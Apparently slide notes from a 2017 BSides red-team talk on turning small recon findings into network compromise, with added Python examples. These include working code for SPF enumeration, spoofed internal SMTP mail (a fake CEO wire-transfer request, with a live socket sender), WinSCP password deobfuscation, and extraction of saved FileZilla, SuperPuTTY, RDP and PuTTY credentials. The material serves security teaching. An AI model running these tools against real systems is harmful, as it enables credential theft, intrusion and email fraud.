Breadcrumbs to Loaves: How tidbits of Information Lead Us to Full-Scale Compromise. Presented at BSides Austin 2017. Follow on Twitter: @arvanaghi
Often on red teams, there is no obvious path to compromising the environment. Reconnaissance efforts, both external and internal, may yield only crumbs of information. Though tiny and often in obscure locations, these bits of information can serve as a trail of breadcrumbs to full-scale compromise. Specific keys in the Windows Registry and unusual sources of open-source intelligence gathering can provide valuable information about a network mapping that most companies don’t know exist. We walk you step-by-step through what some of these crumbs are, how to find them, and how we have used tiny bits of information to escalate our privileges to full-scale enterprise compromise.
Crumb #3: Unauthenticated SMTP Server
• If port 25 (SMTP) is open on a remote host, you may be able to send unauthenticated mail from that server to internal employees
• Without authentication, you can put any internal address in MAIL FROM and spoof any internal sender!
http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp-commands-via-gmail
https://community.rapid7.com/community/infosec/blog/2015/02/23/osint-through-sender-policy-framework-spf-records
The receiving mail server automatically checks the SPF record for the sender's domain, if one exists. A domain with no SPF record, or one that ends in ~all (softfail) rather than -all, leaves a spoofed message with a good chance of being accepted.
Social engineering opportunities arise from seeing an organization's third-party relationships (the include: mechanisms in the record) all from a single DNS record!
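The SPF walk described above, as an added example (not the talk's code and not the Rapid7 post's): it follows include: and redirect= mechanisms, lists the third-party senders and IP ranges a domain has authorized, counts DNS lookups against the RFC 7208 limit of ten, and grades the trailing all term, which decides what a receiver does with a spoofed message. The DNS answers in LOOKUP are constructed; a live run would replace the dict with TXT queries (dnspython's dns.resolver would do, but is not used here).

```python
"""Walk an SPF record, list the third parties it authorizes, and grade its policy.

Added example, not code from the talk or from the Rapid7 post it cites.
LOOKUP holds constructed TXT answers standing in for DNS; swap in real queries
to run it against a live domain.
"""

MAX_DNS_LOOKUPS = 10   # RFC 7208 s4.6.4: receivers stop evaluating after ten lookups

# Constructed TXT answers (not real zone data).
LOOKUP = {
    "example.com": ("v=spf1 ip4:203.0.113.0/24 include:_spf.google.com "
                    "include:mail.zendesk.com include:spf.salesforce.com ~all"),
    "_spf.google.com": "v=spf1 include:_netblocks.google.com -all",
    "_netblocks.google.com": "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 -all",
    "mail.zendesk.com": "v=spf1 ip4:192.0.2.0/24 -all",
    "spf.salesforce.com": "v=spf1 ip4:198.51.100.0/24 redirect=_spf.salesforce.com",
    "_spf.salesforce.com": "v=spf1 ip4:198.51.100.128/25 -all",
}

LOOKUP_MECHANISMS = ("a", "mx", "ptr", "exists")   # each of these also costs a DNS query


def walk_spf(domain, lookup=LOOKUP, state=None, is_root=True):
    """Recursively collect include:/redirect= targets and ip4/ip6 ranges reachable from domain.

    Only the root record (or a redirect= chain from it) decides the policy, so an
    'all' term inside an included record is deliberately not recorded.
    """
    if state is None:
        state = {"includes": [], "ip4": [], "ip6": [], "all": None, "lookups": 0, "seen": set()}
    if domain in state["seen"]:                 # include/redirect loops terminate here
        return state
    state["seen"].add(domain)
    record = lookup.get(domain, "")
    if not record.startswith("v=spf1"):         # no record, or not SPF: nothing to learn
        return state

    redirect, saw_all = None, False
    for term in record.split()[1:]:
        qualifier = term[0] if term[0] in "+-~?" else "+"
        mech = term.lstrip("+-~?")
        name, _, arg = mech.partition(":")
        name = name.split("/")[0]               # "mx/24" style CIDR suffixes
        if name == "include":
            state["includes"].append(arg)
            state["lookups"] += 1
            walk_spf(arg, lookup, state, is_root=False)
        elif mech.startswith("redirect="):
            redirect = mech.split("=", 1)[1]
        elif name == "ip4":
            state["ip4"].append(arg)
        elif name == "ip6":
            state["ip6"].append(arg)
        elif name in LOOKUP_MECHANISMS:
            state["lookups"] += 1
        elif mech == "all":
            saw_all = True
            if is_root:
                state["all"] = qualifier + "all"
    if redirect and not saw_all:                # redirect= is ignored when the record has an 'all' term
        state["includes"].append(redirect)
        state["lookups"] += 1
        walk_spf(redirect, lookup, state, is_root=is_root)
    return state


def grade_policy(all_term):
    """Translate the trailing 'all' qualifier into what a receiver does with spoofed mail."""
    return {
        "-all": "hardfail: spoofed mail from unlisted hosts should be rejected",
        "~all": "softfail: spoofed mail is usually accepted, at most flagged",
        "?all": "neutral: SPF gives the receiver nothing to act on",
        "+all": "pass: any host on the Internet may send as this domain",
        None: "no all term: treated as neutral",
    }.get(all_term, "unknown: " + str(all_term))


def spf_report(domain, lookup=LOOKUP):
    s = walk_spf(domain, lookup)
    return {
        "third_parties": s["includes"],
        "ip4": s["ip4"],
        "ip6": s["ip6"],
        "policy": s["all"],
        "verdict": grade_policy(s["all"]),
        "dns_lookups": s["lookups"],
        "over_lookup_limit": s["lookups"] > MAX_DNS_LOOKUPS,   # permerror: receivers may ignore SPF entirely
    }


if __name__ == "__main__":
    for key, value in spf_report("example.com").items():
        print(f"{key:>18}: {value}")
```

The include: list is the OSINT payoff (mail providers, ticketing, CRM vendors); the policy grade is the check to make before spending an open relay on a spoofed message, since a -all record with a strict receiver will bounce it while ~all usually lets it through.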
SEC form 10-K, exhibit 21. Form that discloses a company’s subsidiaries.
Primary target for attacking a large organization: small, lesser-known subsidiaries.
Command-line syntax:
HELO <domain>              Identifies the client and prepares the SMTP server for the session
MAIL FROM:<email address>  Envelope sender; with no authentication this can be any internal address
RCPT TO:<email address>    Envelope recipient
DATA                       Message headers (From, To, Subject) and body, ended by a line containing only "."
Image source: http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp-commands-via-gmail
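The HELO / MAIL FROM / RCPT TO / DATA exchange above, replayed end to end as an added example (not code from the talk). OpenRelaySim is a constructed stand-in for a port-25 server that never asks for AUTH but only relays to its own domain, which is the common shape of the "unauthenticated SMTP" crumb: inbound spoofing works, outbound relaying does not. send_live() pushes the identical transcript over a real socket; its host and port are placeholders you supply.

```python
"""Replay the unauthenticated SMTP exchange from the slide against a simulated relay.

Added example, not code from the talk. OpenRelaySim is a constructed stand-in for a
port-25 server that never demands AUTH; send_live() pushes the same transcript over
a real socket (host and port are placeholders you supply).
"""
import socket

CRLF = "\r\n"


def build_transcript(helo_domain, mail_from, rcpt_to, subject, body, header_from=None):
    """Client side of one spoofed message, one command or message line per list entry.

    The envelope sender (MAIL FROM) and the header From: are independent; a relay that
    skips AUTH accepts whatever is placed in both. Body lines beginning with '.' are
    dot-stuffed so they cannot end the DATA section early (RFC 5321 s4.5.2).
    """
    header_from = header_from or mail_from
    stuffed = [("." + ln if ln.startswith(".") else ln) for ln in body.splitlines()]
    message = [f"From: {header_from}", f"To: {rcpt_to}", f"Subject: {subject}", ""] + stuffed
    return [f"HELO {helo_domain}", f"MAIL FROM:<{mail_from}>", f"RCPT TO:<{rcpt_to}>",
            "DATA", *message, ".", "QUIT"]


def _addr(line):
    """Address from 'MAIL FROM:<a@b>' or 'RCPT TO:<a@b>'; '' for the null sender '<>'."""
    parts = line.split(":", 1)[1].strip().strip("<>").split()
    return parts[0].lower() if parts else ""


class OpenRelaySim:
    """Server state machine: any MAIL FROM is accepted, only local recipients are relayed."""

    def __init__(self, internal_domain):
        self.internal_domain = internal_domain.lower()
        self.state, self.envelope, self.data, self.delivered = "greet", {}, [], []

    def greeting(self):
        return f"220 mail.{self.internal_domain} ESMTP ready"

    def handle(self, line):
        if self.state == "data":
            if line == ".":
                self.delivered.append({**self.envelope, "body": "\n".join(self.data)})
                self.state = "helo"
                return "250 2.0.0 Ok: queued"
            self.data.append(line[1:] if line.startswith(".") else line)   # undo dot-stuffing
            return None                                                    # server is silent here
        verb = line.split(" ", 1)[0].upper()
        if verb in ("HELO", "EHLO"):
            self.state = "helo"
            return f"250 mail.{self.internal_domain} Hello"
        if verb == "MAIL" and self.state == "helo":
            self.envelope = {"mail_from": _addr(line)}      # no AUTH, no check on the sender domain
            self.state = "mail"
            return "250 2.1.0 Sender ok"
        if verb == "RCPT" and self.state == "mail":
            rcpt = _addr(line)
            if not rcpt.endswith("@" + self.internal_domain):
                return "554 5.7.1 Relay access denied"      # inbound-only relay: external targets refused
            self.envelope["rcpt_to"] = rcpt
            self.state = "rcpt"
            return "250 2.1.5 Recipient ok"
        if verb == "DATA" and self.state == "rcpt":
            self.state, self.data = "data", []
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            return "221 2.0.0 Bye"
        return "503 5.5.1 Bad sequence of commands"


def replay(transcript, server):
    """Feed the transcript to a simulated server; returns [(client_line, server_reply)]."""
    return [("", server.greeting())] + [(line, server.handle(line)) for line in transcript]


def send_live(host, port, transcript, timeout=10):
    """Same transcript over TCP (not exercised offline). HELO keeps every reply to one line."""
    with socket.create_connection((host, port), timeout=timeout) as sock, sock.makefile("rb") as rx:
        replies, in_data = [rx.readline().decode(errors="replace").rstrip()], False
        for line in transcript:
            sock.sendall((line + CRLF).encode())
            if in_data and line != ".":
                continue                                    # no reply until the lone '.'
            reply = rx.readline().decode(errors="replace").rstrip()
            replies.append(reply)
            in_data = line == "DATA" and reply.startswith("354")
        return replies


if __name__ == "__main__":
    relay = OpenRelaySim("corp.example")
    lines = build_transcript("mail.corp.example", "ceo@corp.example", "finance@corp.example",
                             "Urgent wire transfer", "Please process the attached invoice today.")
    for client, reply in replay(lines, relay):
        if client:
            print("C:", client)
        if reply:
            print("S:", reply)
```

Against a real server the tell is the reply to MAIL FROM: a 250 means the relay takes the spoofed sender; a 530 "Authentication required" means this host is not the crumb you were looking for.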
EyeWitness by Christopher Truncer: https://github.com/ChrisTruncer/EyeWitness
EyeWitness automatically screenshots all HTTP/HTTPS services discovered by Nmap for you, and makes an attempt at classifying the kind of site each one is. When EyeWitness recognizes a login page, it will provide you the default credentials typically used for that service.
Photo taken from https://www.christophertruncer.com/eyewitness-triage-tool/
Wired-in network on the left with Ethernet. These hosts should, in theory, not be visible to any system not physically connected to their network. Security guards at the door, physical access controls, monitoring all wall ports, etc.
On one of our engagements, we saw that the physically connected computers were still probing for remembered SSIDs because their WiFi was left on. Most people do not turn off WiFi even when they are wired in, which can make them visible to the outside world!
We spoofed the “gogoinflight” SSID and established an association between our TP-Link access point and the system. Now we could see the system on our own spoofed subnet, see what services it was running, and run tools against it.
By running Responder or a social engineering campaign to capture credentials, we could then use PsExec or WMIExec to exploit that system from our new subnet. Once we had gained access to that system, we could pivot into the wired internal network, since the host is dual-homed!
Essentially, we get the same wired-in access as any system physically connected. Despite this company having no remote portal or VPN, this physical security measure failed because WiFi was left enabled.
System Preferences > Network > Advanced
It used to be that a more “preferred” network would make your system drop its current association: e.g. if you were connected to CompanyWiFi but had gogoinflight higher in your preferred list and a gogoinflight SSID appeared, your system would automatically switch!
https://github.com/fireeye/SessionGopher
SID structure: S-1-5-21-<domain identifier>-<RID>. The three sub-authorities after 21 identify the domain (or the local machine); the trailing RID identifies the account.
Query all of these for domain users who have logged on!
The Registry has both volatile and static data. As an example, HKEY_LOCAL_MACHINE\HARDWARE fills its subkeys at boot time after analyzing the hardware under the Windows system.
HKEY_USERS has persistent information about domain users who have logged onto a system. HKEY_CURRENT_USER is actually a symlink to the HKEY_USERS subkey of the currently logged in user!
Persistent artifacts from all these tools can help build a network map that covers not just Unix systems but also jump boxes. Jump boxes can be difficult to find, but when you extract all saved RDP sessions from each host, you can see where those servers RDP to. Once you find a saved RDP session with a hostname you know to be in a segmented environment, you know which server can communicate with that host!
The saved password string above for WinSCP sessions is not encrypted by default. It is obfuscated, and the obfuscation is easily reversible. The “key” is the session hostname + username.
The password is only encrypted when the “UseMasterPassword” value in the second registry subkey is set to 1. If that is set, you can only extract the encrypted password and attempt to brute-force the master password.
As seen here, WinSCP’s password obfuscation algorithm is a sequence of bitwise operations: each character is inverted and XOR’d with a magic value, then written as two hex digits. The algorithm has been reverse engineered in several languages, but never before in PowerShell.
SessionGopher’s built-in WinSCP deobfuscator
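The deobfuscation described above, as an added example in Python rather than SessionGopher's own PowerShell: the per-character step is bitwise NOT followed by XOR with 0xA3, and the stored string is a flag byte, a random byte, the payload length, a random shift count, that many random bytes, then username + hostname + password. Only the length of the key prefix matters for recovery, so the slide's "hostname + username" and the reverse order both work; the recovered prefix is compared against both here as a check that the right session's hostname and username were supplied. The session name, host, user and password below are constructed; the obfuscator is included only to produce test material.

```python
"""Reverse WinSCP's stored-password obfuscation (the default when no master password is set).

Added example, not SessionGopher's PowerShell deobfuscator. The stored value lives at
HKCU\Software\Martin Prikryl\WinSCP 2\Sessions\<session>\Password as a hex string.
The sample session at the bottom is constructed.
"""
import random

FLAG = 0xFF     # PWALG_SIMPLE_FLAG: marks the layout with random byte + length + shift
MAGIC = 0xA3    # PWALG_SIMPLE_MAGIC: XOR constant
MAXLEN = 50     # PWALG_SIMPLE_MAXLEN: output padded to at least 50 bytes (100 hex digits)


def _obfuscate_byte(b):
    return f"{(~b ^ MAGIC) & 0xFF:02X}"


def _deobfuscate_byte(hex_pair):
    return ~(int(hex_pair, 16) ^ MAGIC) & 0xFF


def winscp_deobfuscate(stored, hostname, username):
    """Recover the plaintext password from a session key's 'Password' value."""
    if not stored or len(stored) % 2:
        raise ValueError("hex string with an even number of digits expected")
    pos = 0

    def next_byte():
        nonlocal pos
        if pos + 2 > len(stored):
            raise ValueError("stored value is truncated")
        b = _deobfuscate_byte(stored[pos:pos + 2])
        pos += 2
        return b

    flag = next_byte()
    if flag == FLAG:
        next_byte()                 # random filler byte
        length = next_byte()        # bytes of key + password that follow the shift
    else:
        length = flag               # older layout: the first byte is the length itself
    shift = next_byte()
    pos += 2 * shift                # skip the random prefix bytes
    payload = bytes(next_byte() for _ in range(length))   # trailing padding is ignored
    if flag != FLAG:
        return payload.decode("utf-8", "replace")
    key_len = len((username + hostname).encode("utf-8"))
    prefix, password = payload[:key_len], payload[key_len:]
    if prefix.decode("utf-8", "replace") not in (username + hostname, hostname + username):
        raise ValueError("key prefix mismatch: wrong hostname/username for this session")
    return password.decode("utf-8")


def winscp_obfuscate(password, hostname, username, shift=None, rng=None):
    """Produce what WinSCP writes to the registry; pass a seeded rng for reproducible output."""
    rng = rng or random.Random()
    payload = (username + hostname + password).encode("utf-8")
    if len(payload) > 0xFF:
        raise ValueError("payload too long for the one-byte length field")
    if shift is None:
        shift = rng.randrange(MAXLEN) if len(payload) < MAXLEN else 0
    out = [_obfuscate_byte(FLAG), _obfuscate_byte(rng.randrange(256)),
           _obfuscate_byte(len(payload)), _obfuscate_byte(shift)]
    out += [_obfuscate_byte(rng.randrange(256)) for _ in range(shift)]
    out += [_obfuscate_byte(b) for b in payload]
    while len(out) < MAXLEN:
        out.append(_obfuscate_byte(rng.randrange(256)))
    return "".join(out)


if __name__ == "__main__":
    # Constructed session: not a real host, account or password.
    host, user, secret = "sftp.backup.corp.example", "svc_backup", "Winter2017!"
    blob = winscp_obfuscate(secret, host, user, rng=random.Random(7))
    print("stored :", blob)
    print("plain  :", winscp_deobfuscate(blob, host, user))
```

If the Configuration\Security key has UseMasterPassword set to 1, the Password value is real ciphertext rather than this encoding, and this routine will fail the prefix check; that is the cue to collect the blob for offline cracking instead.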
HKEY_USERS\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Default contains most recent RDP attempts
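Working through the HKEY_USERS and Terminal Server Client passages above, as an added example (not SessionGopher, which reads these keys remotely over WMI): this parses a `reg export HKU` text dump, separates account SIDs from the well-known hives, and joins each Default\MRUn target to the UsernameHint under Servers\<host>. The caveat the SID passage glosses over is that local and domain accounts both look like S-1-5-21-...-RID, so the authority part has to be compared with the domain SID (a domain user's SID from `whoami /user`, minus its RID) to keep only domain users. SAMPLE_REG and CORP_DOMAIN_SID are constructed.

```python
"""List logged-on account SIDs and RDP history from an HKEY_USERS registry export.

Added example, not SessionGopher's code. SAMPLE_REG is constructed to look like
`reg export HKU` output, already decoded from the UTF-16LE the tool writes; the
domain SID is made up too.
"""
import re

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion]

[HKEY_USERS\S-1-5-21-1004336348-1177238915-682003330-1105\Software\Microsoft\Terminal Server Client\Default]
"MRU0"="jump01.corp.example"
"MRU1"="10.20.30.40"

[HKEY_USERS\S-1-5-21-1004336348-1177238915-682003330-1105\Software\Microsoft\Terminal Server Client\Servers\jump01.corp.example]
"UsernameHint"="CORP\\adm_jdoe"
"CertHash"=hex:2a,1f,\
  9c,00

[HKEY_USERS\S-1-5-21-1004336348-1177238915-682003330-1105_Classes\Local Settings]

[HKEY_USERS\S-1-5-21-3623811015-3361044348-30300820-1013\Software\Microsoft\Terminal Server Client\Default]
"MRU0"="nas.home.lan"
'''
CORP_DOMAIN_SID = "S-1-5-21-1004336348-1177238915-682003330"   # constructed: a domain user's SID minus its RID

SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def parse_reg(text):
    """Return {key_path: {value_name: value}}; strings and dwords decoded, other types kept raw."""
    keys, current, pending = {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if pending is not None:                          # continuation of a multi-line hex value
            keys[current][pending] += line.rstrip("\\")
            pending = pending if line.endswith("\\") else None
            continue
        if not line or line.startswith(("Windows Registry Editor", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        name, _, data = line.partition("=")
        name = "" if name == "@" else name.strip('"')   # "@" is the key's default value
        if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            value = data[1:-1].replace("\\\\", "\\").replace('\\"', '"')
        elif data.startswith("dword:"):
            value = int(data[6:], 16)
        else:
            value = data.rstrip("\\")                    # hex:, hex(2):, ... left as written
            if data.endswith("\\"):
                pending = name
        keys[current][name] = value
    return keys


def classify_sid(hive_name):
    """Split an HKEY_USERS subkey name into (kind, authority, rid)."""
    if hive_name.endswith("_Classes"):
        return ("classes", None, None)     # per-user HKCR mirror, no profile data
    if hive_name in (".DEFAULT", "S-1-5-18", "S-1-5-19", "S-1-5-20"):
        return ("system", None, None)      # default profile, LocalSystem, LocalService, NetworkService
    m = SID_RE.match(hive_name)
    if m:
        return ("account", m.group(1), int(m.group(2)))
    return ("other", None, None)


def _account_hives(reg, domain_sid):
    for key in reg:
        parts = key.split("\\")
        if len(parts) > 1 and parts[0] == "HKEY_USERS":
            kind, authority, rid = classify_sid(parts[1])
            if kind == "account" and (domain_sid is None or authority == domain_sid):
                yield key, parts[1], rid


def logged_on_accounts(reg, domain_sid=None):
    """Account SIDs with a loaded profile; pass domain_sid to drop local accounts."""
    return sorted({sid for _, sid, _ in _account_hives(reg, domain_sid)})


def rdp_history(reg, domain_sid=None):
    """Every RDP target in a profile's MRU list, joined to the saved UsernameHint if any."""
    results = []
    for key, sid, rid in _account_hives(reg, domain_sid):
        if not key.endswith("\\Terminal Server Client\\Default"):
            continue
        mru = sorted((int(n[3:]), v) for n, v in reg[key].items() if n.startswith("MRU") and n[3:].isdigit())
        for _, target in mru:
            hint_key = key[:-len("Default")] + "Servers\\" + target
            results.append({"sid": sid, "rid": rid, "target": target,
                            "username_hint": reg.get(hint_key, {}).get("UsernameHint")})
    return results


if __name__ == "__main__":
    reg = parse_reg(SAMPLE_REG)
    print("accounts:", logged_on_accounts(reg))
    for row in rdp_history(reg, CORP_DOMAIN_SID):
        print(f"RID {row['rid']} -> {row['target']} as {row['username_hint']}")
```

Feed it the export of each host in turn and the RDP targets that recur across many profiles are the jump boxes; a target that appears in exactly one profile is the interesting path into a segmented network.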
FileZilla stores its password in an XML file, not in the registry. By default, the saved password is only base-64 encoded, and not encrypted.
SuperPuTTY is used to manage simultaneous PuTTY sessions, and has the added benefit of storing passwords for one-click SSH sessions. PuTTY itself does not store passwords, so many users run SuperPuTTY as a wrapper.
SuperPuTTY sessions are saved in a Sessions.xml file, not in the registry. The password is placed in the “ExtraArgs” attribute, which can contain a multitude of additional arguments. SuperPuTTY passes anything following “-pw” to PuTTY as the password argument for the SSH session.
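The two XML artifacts from the FileZilla and SuperPuTTY passages, parsed as an added example (not SessionGopher's code). The SuperPuTTY side pulls the token after -pw out of ExtraArgs without mangling quoted passwords or Windows paths, and records a -i key file when there is no password at all; the FileZilla side handles both the Base64 <Pass encoding="base64"> written by current releases and the verbatim <Pass> of older ones. Both documents are constructed, including every host, user and password in them.

```python
"""Recover saved credentials from SuperPuTTY's Sessions.xml and FileZilla's sitemanager.xml.

Added example, not SessionGopher's parsers. Both XML documents are constructed.
FileZilla keeps sitemanager.xml under %APPDATA%\FileZilla; SuperPuTTY keeps
Sessions.xml in its own settings folder under the user's profile.
"""
import base64
import shlex
import xml.etree.ElementTree as ET

SUPERPUTTY_XML = """<?xml version="1.0" encoding="utf-8"?>
<ArrayOfSessionData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <SessionData SessionId="prod/db01" SessionName="db01" ImageKey="computer" Host="10.10.5.21" Port="22" Proto="SSH" PuttySession="Default Settings" Username="root" ExtraArgs="-pw Pr0d-DB-2017" />
  <SessionData SessionId="prod/jump" SessionName="jump" ImageKey="computer" Host="jump01.corp.example" Port="2222" Proto="SSH" PuttySession="Default Settings" Username="adm_jdoe" ExtraArgs="-agent -pw &quot;has space&quot; -X" />
  <SessionData SessionId="lab/kali" SessionName="kali" ImageKey="computer" Host="192.168.56.101" Port="22" Proto="SSH" PuttySession="Default Settings" Username="kali" ExtraArgs="-i C:\\keys\\lab.ppk" />
</ArrayOfSessionData>
"""

FILEZILLA_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.27.1" platform="windows">
  <Servers>
    <Server>
      <Host>ftp.vendor.example</Host><Port>21</Port><Protocol>0</Protocol><Type>0</Type>
      <User>corp_upload</User><Pass encoding="base64">VXBsMGFkIUZhbGwyMDE3</Pass>
      <Logontype>1</Logontype><Name>Vendor FTP</Name>
    </Server>
    <Server>
      <Host>sftp.legacy.corp.example</Host><Port>22</Port><Protocol>1</Protocol><Type>0</Type>
      <User>backup</User><Pass>plaintext-from-old-version</Pass>
      <Logontype>1</Logontype><Name>Legacy SFTP</Name>
    </Server>
  </Servers>
</FileZilla3>
"""

FILEZILLA_PROTOCOLS = {"0": "ftp", "1": "sftp", "3": "ftps", "4": "ftpes"}   # FileZilla's ServerProtocol enum


def superputty_sessions(xml_text):
    """One dict per <SessionData>; password comes from the token after -pw in ExtraArgs."""
    out = []
    for node in ET.fromstring(xml_text).iter("SessionData"):
        # posix=False keeps Windows backslashes and quoted arguments intact
        tokens = shlex.split(node.get("ExtraArgs") or "", posix=False)
        password = key_file = None
        for i, tok in enumerate(tokens[:-1]):
            if tok == "-pw":
                password = tokens[i + 1].strip('"')
            elif tok == "-i":
                key_file = tokens[i + 1].strip('"')
        out.append({"session": node.get("SessionId"), "host": node.get("Host"),
                    "port": int(node.get("Port") or 22), "user": node.get("Username"),
                    "password": password, "key_file": key_file})
    return out


def filezilla_servers(xml_text):
    """One dict per <Server>; decodes Base64 passwords and passes legacy plaintext through."""
    out = []
    for server in ET.fromstring(xml_text).iter("Server"):
        pass_node = server.find("Pass")
        password = None
        if pass_node is not None and pass_node.text:
            if pass_node.get("encoding") == "base64":          # FileZilla 3.26 and later
                password = base64.b64decode(pass_node.text).decode("utf-8", "replace")
            else:
                password = pass_node.text                      # older releases wrote it verbatim
        out.append({"name": server.findtext("Name"), "host": server.findtext("Host"),
                    "port": int(server.findtext("Port") or 0),
                    "protocol": FILEZILLA_PROTOCOLS.get(server.findtext("Protocol"), "other"),
                    "user": server.findtext("User"), "password": password})
    return out


if __name__ == "__main__":
    for s in superputty_sessions(SUPERPUTTY_XML):
        print("SuperPuTTY", s["user"], "@", s["host"], s["port"], "pw:", s["password"], "key:", s["key_file"])
    for f in filezilla_servers(FILEZILLA_XML):
        print("FileZilla ", f["user"], "@", f["host"], f["protocol"], "pw:", f["password"])
```

A session with a -i key file and no -pw is still worth recording: the .ppk it points at is the next artifact to collect.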
Stored sessions as .rdp files can be used for one-click logins. Double-clicking one launches mstsc with its settings, but the files are plain text and can also be dragged into a text editor like Sublime Text and read.
SessionGopher parses the .ppk and .rdp files and makes sense of them. For a .ppk it returns the private key, the Private-MAC, and whether or not the key is encrypted.
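The .rdp and .ppk parsing just described, as an added example that is not SessionGopher's parser. The .rdp reader handles the UTF-16LE-with-BOM files mstsc writes as well as hand-edited ASCII ones, types each name:type:value line, and reports whether a "password 51" DPAPI blob is present (it is recoverable only with the saving user's DPAPI master key, so the check is "is there something to recover", not a decryption). The .ppk reader joins the Public-Lines/Private-Lines blocks and reports key type, cipher and Private-MAC. Both samples are constructed; the Base64 in the .ppk is filler, not a real key.

```python
"""Parse saved .rdp connection files and PuTTY .ppk keys the way a triage script would.

Added example, not SessionGopher's code. RDP_SAMPLE and PPK_SAMPLE are constructed:
the hostnames are placeholders, the 'password 51' bytes are just a DPAPI-shaped header,
and the .ppk Base64 is filler rather than key material.
"""

RDP_SAMPLE = b"\xff\xfe" + "\r\n".join([          # mstsc writes UTF-16LE with a BOM
    "screen mode id:i:2",
    "full address:s:jump01.corp.example:3389",
    "username:s:adm_jdoe",
    "domain:s:CORP",
    "gatewayhostname:s:rdgw.corp.example",
    "gatewayusagemethod:i:1",
    "password 51:b:01000000d08c9ddf0115d1118c7a00c04fc297eb",
    "",
]).encode("utf-16-le")

PPK_SAMPLE = """PuTTY-User-Key-File-2: ssh-rsa
Encryption: aes256-cbc
Comment: rsa-key-20170301
Public-Lines: 2
AAAAB3NzaC1yc2EAAAABJQAAAIEAq3B1YmxpYy1saW5lLTEtY29uc3RydWN0ZWQt
ZXhhbXBsZQ==
Private-Lines: 2
Y29uc3RydWN0ZWQtcHJpdmF0ZS1saW5lLTEtbm90LWEtcmVhbC1rZXk=
Y29uc3RydWN0ZWQtcHJpdmF0ZS1saW5lLTI=
Private-MAC: 0f1e2d3c4b5a69788796a5b4c3d2e1f00f1e2d3c
"""


def decode_rdp(raw):
    """Accept the UTF-16 BOM variants mstsc produces and plain UTF-8/ASCII alike."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig", "replace")


def parse_rdp(raw):
    """Return {setting: value} from 'name:type:value' lines; s=string, i=int, b=binary hex."""
    settings = {}
    for line in decode_rdp(raw).splitlines():
        line = line.strip()
        if line.count(":") < 2:
            continue
        name, kind, value = line.split(":", 2)   # the value itself may contain ':' (host:port)
        if kind == "i":
            value = int(value)
        elif kind == "b":
            value = bytes.fromhex(value)
        settings[name] = value
    return settings


def rdp_summary(raw):
    s = parse_rdp(raw)
    return {"target": s.get("full address"), "gateway": s.get("gatewayhostname"),
            "user": s.get("username"), "domain": s.get("domain"),
            # DPAPI blob: only the saving user's master key, on that machine, can open it
            "has_saved_password": "password 51" in s}


def parse_ppk(text):
    """Read a PuTTY private key file's headers and join its Base64 blocks."""
    lines, info, i = text.splitlines(), {}, 0
    while i < len(lines):
        if not lines[i].strip():
            i += 1
            continue
        key, _, value = lines[i].partition(": ")
        if key in ("Public-Lines", "Private-Lines"):
            n = int(value)
            info[key.lower().replace("-lines", "")] = "".join(lines[i + 1:i + 1 + n])
            i += n
        else:
            info[key] = value
        i += 1
    header = next(k for k in info if k.startswith("PuTTY-User-Key-File"))
    cipher = info.get("Encryption", "none")
    return {"format_version": int(header.rsplit("-", 1)[1]), "key_type": info[header],
            "comment": info.get("Comment"), "encrypted": cipher != "none", "cipher": cipher,
            "public_b64": info["public"], "private_b64": info["private"],
            "private_mac": info.get("Private-MAC")}


if __name__ == "__main__":
    print(rdp_summary(RDP_SAMPLE))
    k = parse_ppk(PPK_SAMPLE)
    print(k["key_type"], "encrypted" if k["encrypted"] else "unencrypted", "MAC", k["private_mac"])
```

An unencrypted .ppk is a usable credential on the spot; an encrypted one still tells you the key type and comment, and the Private-MAC gives an offline cracking target for the passphrase.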
Invoke-WmiMethod allows you to use WMI to read the remote registry of a different system via the -Class 'StdRegProv' provider. From your own attack computer connected to the network, you can read the persistent registry artifacts under HKEY_USERS on each box using WMI. Quiet, quick, and effective!
Invoke-SessionGopher -iL inputlist.txt
Invoke-SessionGopher -AllDomain
Invoke-SessionGopher -Target winbox.company.com
After running SessionGopher across a domain or set of computers, you will essentially have a network mapping of the entire corporate infrastructure! Jump boxes, Unix systems, and other non-domain hosts should all be revealed to you along with the path to get there.